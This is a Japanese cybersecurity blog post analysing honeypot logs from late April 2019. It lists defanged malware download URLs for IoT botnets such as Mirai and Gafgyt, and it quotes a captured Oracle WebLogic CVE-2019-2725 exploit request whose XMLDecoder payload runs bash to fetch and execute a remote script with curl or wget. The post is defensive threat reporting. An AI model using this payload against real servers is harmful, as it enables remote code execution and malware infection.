sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeytrap簡易分析(249-257日目:4/22-4/30)

令和初のハニーポットの簡易分析となります。IoT製品を狙った攻撃は継続していますが、Oracle WebLogic Server の脆弱性 (CVE-2019-2725)も検知していました。

Honeytrap簡易分析(249-257日目:4/22-4/30)
※80ポートは除く

f:id:one-chick-sec:20190502013845p:plain

送信元IPの国別で確認してみたところ、中国付近からの通信が多い傾向でした。

f:id:one-chick-sec:20190502014107p:plain

<新規マルウェアダウンロード>

ポート マルウェアダウンロード先 HTTPリクエストパス 備考
5555 hxxp://104[.]168[.]157[.]45/icy[.]sh POST /UD/?9  
7001 89[.]35[.]39[.]78/2[.]sh POST /_async/AsyncResponseService  
7001 hxxp://165[.]227[.]78[.]159/wl[.]php POST /_async/AsyncResponseService  
7547 hxxp://31[.]13[.]195[.]251/UqHDZbqr9S[.]sh POST /UD/act?1   
8080 hxxp://165[.]22[.]69[.]188/nope/mpsl[.]daddyscum POST /tmUnblock.cgi  Mirai
8080 hxxp://185[.]244[.]25[.]135/nope/mpsl[.]daddyscum POST /tmUnblock.cgi  Mirai
8080 hxxp://194[.]147[.]32[.]131/bins/frosty[.]mpsl POST /tmUnblock.cgi  Mirai
8080 hxxp://51[.]75[.]35[.]174/all/ntpdd[.]mpsl POST /tmUnblock.cgi  Mirai
8081 hxxp://51[.]75[.]35[.]174/all/ntpdd[.]mips POST /HNAP1/  Mirai
52869 hxxp://176[.]56[.]237[.]213/Demon[.]mips POST /picsdesc.xml  Gafgyt
52869 hxxp://185[.]52[.]1[.]95/Demon[.]mips POST /picsdesc.xml  Gafgyt
52869 hxxp://185[.]70[.]105[.]177/mips POST /picsdesc.xml  Mirai
52869 hxxp://185[.]70[.]105[.]63/mips POST /picsdesc.xml  Mirai
52869 hxxp://206[.]189[.]237[.]121/real[.]sh POST /picsdesc.xml  Mirai
52869 hxxp://23[.]254[.]224[.]39/mips POST /picsdesc.xml   
52869 hxxp://5[.]180[.]40[.]102/mppsx POST /picsdesc.xml   

IoT製品を狙った通信が多いですが、Oracle WebLogic Server の脆弱性 (CVE-2019-2725)を狙った通信も検知しています。
https://www.jpcert.or.jp/at/2019/at190020.html

シェルスクリプトファイルとphpへのアクセスとなっており、前者は現在アクセスできないため、詳細は不明です。後者はページ自体をVTで調査したところ、特にマルウェア判定がなかったため、そのサイトへアクセスした際に脆弱性が存在すると判定しているのではないかと推測します。
なお、実際のペイロードは以下となります。

POST /_async/AsyncResponseService hxxp/1.1
Host: xxx.xxx.xxx.xxx:7001
.User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="hxxp://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="hxxp://www.w3.org/2005/08/addressing" xmlns:asy="hxxp://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="hxxp://bea.com/2004/06/soap/workarea/"><java version="1.4.0" class="java.beans.XMLDecoder">.. <void class="java.lang.ProcessBuilder">.. <array class="java.lang.String" length="3">.. <void index="0">.. <string>/bin/bash</string>.. </void>.. <void index="1">.. <string>-c</string>.. </void>.. <void index="2">.. <string>(curl -fsSL xxx.xxx.xxx.xxx/2.sh || wget -q -O- xxx.xxx.xxx.xxx/2.sh) | sh</string>.. </void>.. </array>.. <void method="start"/></void>.. </java>..</work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

今回はcurlコマンドおよびwgetコマンドで外部からファイルを取得しようとしているものでした。リモートから任意のコード実行が可能であるため、今後も攻撃は増加していくと思われます。

 

以上となります。